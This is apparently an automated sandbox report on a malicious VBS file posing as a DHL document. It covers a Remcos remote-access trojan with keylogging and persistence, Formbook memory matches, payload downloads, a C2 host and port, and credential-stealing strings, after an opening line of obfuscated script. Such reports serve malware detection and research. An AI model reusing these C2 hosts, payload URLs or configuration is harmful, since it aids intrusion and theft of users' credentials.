egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeInfomUndeeUnd,rUnp,sGod,.SkraHIndpeAgerahided AlleTromrBv
            Timestamp:04/26/24-07:40:40.590604
            SID:2032777
            Source Port:3050
            Destination Port:49715
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/26/24-07:40:40.309700
            SID:2032776
            Source Port:49715
            Destination Port:3050
            Protocol:TCP
            Classtype:A Network Trojan was detected


            AV Detection

            Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
            Source: http://geoplugin.net/json.gp, URL Reputation: Label: phishing
            Source: jgbours284hawara01.duckdns.org, Avira URL Cloud: Label: malware
            Source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Source: jgbours284hawara01.duckdns.org, Virustotal: Detection: 6%
            Source: http://87.121.105.163, Virustotal: Detection: 18%
            Source: DHL_ES567436735845755676678877988975877.vbs, ReversingLabs: Detection: 34%
            Source: Yara match, File source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED
            Source: unknown, HTTPS traffic detected: 188.212.111.134:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 46.254.34.12:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: Binary string: System.Core.pdbF! source: powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: gqm.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdbq source: powershell.exe, 00000005.00000002.2489484769.00000000086E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1989736522.000001A47F191000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1991997565.000001A47E636000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2498526890.000000000351D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2494277320.00000000059E5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: wab.exe
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2469252560.0000000007622000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbTe= source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5c}c source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb7} source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5eU source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 8_2_222E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_222E10F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 8_2_222E6580 FindFirstFileExA,8_2_222E6580
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, File opened: C:\Windows\SysWOW64\WCN\en-GB\
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\
            Source: C:\Program Files (x86)\Windows Mail\wab.exe, File opened: C:\Windows\SysWOW64\WindowsPowerShell\

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\SysWOW64\wscript.exe, Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

            Networking

            Source: Traffic, Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.5:49715 -> 45.88.90.110:3050
            Source: Traffic, Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 45.88.90.110:3050 -> 192.168.2.5:49715
            Source: Malware configuration extractor, URLs: jgbours284hawara01.duckdns.org
            Source: unknown, DNS query: name: jgbours284hawara01.duckdns.org
            Source: global traffic, TCP traffic: 192.168.2.5:49715 -> 45.88.90.110:3050
            Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
            Source: Joe Sandbox View, IP Address: 87.121.105.163 87.121.105.163
            Source: Joe Sandbox View, IP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox View, ASN Name: LVLT-10753US LVLT-10753US
            Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknown, TCP traffic detected without corresponding DNS query: 87.121.105.163
            Source: global traffic HTTP traffic detected: GET /Methink1.thn HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: europrotectie.ro
                Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /FIPWKWOaFXJGe178.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: duelvalenza.it
                Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /FIPWKWOaFXJGe178.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Cache-Control: no-cache
                Host: www.duelvalenza.it
                Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1
                Host: geoplugin.net
                Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /Detentionen.java HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: 87.121.105.163
                Connection: Keep-Alive
            Source: global traffic HTTP traffic detected: GET /PUzAKuQ35.bin HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: 87.121.105.163
                Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /abt9/?Uzgp=d6Th&InLTkv7P=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA== HTTP/1.1
                Host: www.387mfyr.sbs
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Language: en-us
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global traffic DNS traffic detected: DNS query: europrotectie.ro
            Source: global traffic DNS traffic detected: DNS query: duelvalenza.it
            Source: global traffic DNS traffic detected: DNS query: www.duelvalenza.it
            Source: global traffic DNS traffic detected: DNS query: jgbours284hawara01.duckdns.org
            Source: global traffic DNS traffic detected: DNS query: geoplugin.net
            Source: global traffic DNS traffic detected: DNS query: www.387mfyr.sbs
            Source: global traffic DNS traffic detected: DNS query: www.led-svitidla.eu
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 26 Apr 2024 05:41:49 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
            Source: powershell.exe, 0000000E.00000002.3202569251.0000000004FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.0000000004AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163
            Source: powershell.exe, 0000000E.00000002.3202569251.0000000004AF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Detentionen.javaXRwl
            Source: powershell.exe, 00000016.00000002.2824348491.0000000004B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.105.163/Detentionen.javaXRwl4
            Source: powershell.exe, 0000000E.00000002.3202569251.0000000004FCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.121.108
            Source: powershell.exe, 0000000E.00000002.3192791124.0000000000D6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mM5
            Source: powershell.exe, 0000000E.00000002.3263668974.0000000007340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: powershell.exe, 00000005.00000002.2469252560.000000000758E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microD
            Source: powershell.exe, 00000002.00000002.2707049436.00000214ABB20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
            Source: powershell.exe, 00000002.00000002.2568004154.000002149582A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://europrotectie.ro
            Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp)B
            Source: wab.exe, 00000008.00000002.3295624818.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.00000000064AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2493992487.00000000064AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp0B8
            Source: wab.exe, 00000008.00000003.2493965045.000000002247C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpf
            Source: powershell.exe, 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2568004154.0000021493641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2457149588.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2824348491.00000000049D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.duelvalenza.it/FIPWKWOaFXJGe178.bin
            Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2517724529.000000000380D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: wab.exe, 00000014.00000002.2517724529.000000000380D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
            Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: wab.exe, 00000010.00000002.2533483224.0000000002EB4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: powershell.exe, 00000002.00000002.2568004154.0000021493641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000005.00000002.2457149588.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2824348491.00000000049D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBcq
            Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: wab.exe, 00000008.00000003.2493992487.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/
            Source: wab.exe, 00000008.00000002.3312967278.0000000021D50000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295424016.000000000643F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.bin
            Source: wab.exe, 00000008.00000002.3312967278.0000000021D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.binLagdsWaheuroprotectie.ro/FIPWKWOaFXJGe178.bin
            Source: wab.exe, 00000008.00000002.3295424016.000000000643F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.binq(
            Source: powershell.exe, 00000002.00000002.2568004154.0000021493866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2568004154.0000021495668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://europrotectie.ro
            Source: powershell.exe, 00000002.00000002.2568004154.0000021493866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://europrotectie.ro/Methink1.thnP
            Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://europrotectie.ro/Methink1.thnXRwl
            Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2568004154.0000021494A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknown HTTPS traffic detected: 188.212.111.134:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 46.254.34.12:443 -> 192.168.2.5:49713 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0041183A OpenClipboard,GetLastError,DeleteFileW,16_2_0041183A
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,16_2_0040987A
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004098E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_00406DFC
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,19_2_00406E9F
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,20_2_004068B5
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,20_2_004072B5

            E-Banking Fraud

            Source: Yara match File source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

            System Summary

            Source: amsi64_2132.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_2668.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_5804.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_6324.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
